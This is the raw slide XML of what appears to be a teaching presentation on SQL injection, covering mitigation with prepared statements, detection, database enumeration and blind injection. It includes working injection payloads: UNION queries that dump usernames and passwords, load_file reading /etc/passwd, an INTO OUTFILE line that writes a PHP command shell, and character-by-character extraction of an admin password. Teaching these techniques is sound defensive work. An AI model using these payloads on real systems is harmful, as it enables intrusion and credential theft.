              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>SELECT name, text, date FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>comments WHERE text LIKE “%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>who cares%” UNION SELECT id, username, password FROM users;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%”;</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Mitigating SQLI</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>PARAMETERISED QUERIES (aka prepared statements) - these ‘fix’ the SQL statement and add variable values before execution</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>E.g., in PHP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$stmt = mysqli_prepare($dbc, "SELECT * FROM users WHERE username = ? AND password = ?");</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>In general: don’t treat user input as code - treat it as a parameter</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Don’t bother with white/blacklists - there are plenty of examples of them going wrong</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p1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SQL Injection -  A Quick Recap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Advanced SQL Injection</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="39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Detecting SQLI</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Look for parts of the site that may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>interact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> with a database: a login form, a search function, a form that may insert new data</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Try fuzzing for an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> by using a polyglot (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>), or calling functions to determine the SQL Engine being used</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Enumerating the Database</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>If you can arbitrarily select data (for example, with a UNION attack), you can use functions to enumerate the database</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT id, name, quantity, price FROM products WHERE name LIKE “%who cares%” UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user(), database(), session_user(), current_user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;-- %”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>will tell you the name of the database and user information</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Reading and Writing with SQL Functions</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Arbitrary selects can also use the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> load_file(/path/to/file)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> function to read sensitive data (such as /etc/passwd)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO OUTFILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> command allows writing to a file on the system</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>We can use this to upload a shell (assuming the database user has write permissions)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ UNION SELECT 1,’&lt;?php system($_GET[“cmd”]); ?&gt;‘ INTO OUTFILE ‘/path/to/webapp/cmd.php’ --</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="09CEC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Blind Injection is a technique for when you cannot see the output of your query directly</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>UNION attacks, for example, output your data onto the page</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>But what if the server either responds with “OK” or an error if you do something wrong?</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>We can use Blind Injection to craft a query that gives us a certain response based on our input, and use this to extract data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>from the database</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Note: if you use sqlmap, you can perform Boolean Blind Injection attacks using the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --technique=B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t> flag</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Example Attack</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Say we had a page that looked up a user in the database (SELECT username FROM users WHERE username = ‘Mac’) and displays “User Exists!” if </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="1000"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t> data comes back</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>If we pick a valid username, we can then ask the database some yes or no questions: if we inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND ‘1’=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>we get “User Exists!”, and injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND ‘1’=‘2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t> we get a negative result “No User”</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>So let’s change our injection and ask it about something sensitive - for example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND (SELECT password FROM users WHERE username = 'Administrator') = ‘password</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>If we guessed the admin password correctly, we get back “User Exists!” - but this isn’t very likely, of course</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Instead, we can use SUBSTRING to guess it one character at a time: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 's</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>We could then write a Python script to build a password character by character (I would, but I ran out of time...)</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Ippsec has a good example in his </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="1000"/>
              <a:t>Intense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t> video: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=nBg6zUalb7c</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p2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Blind SQL Injection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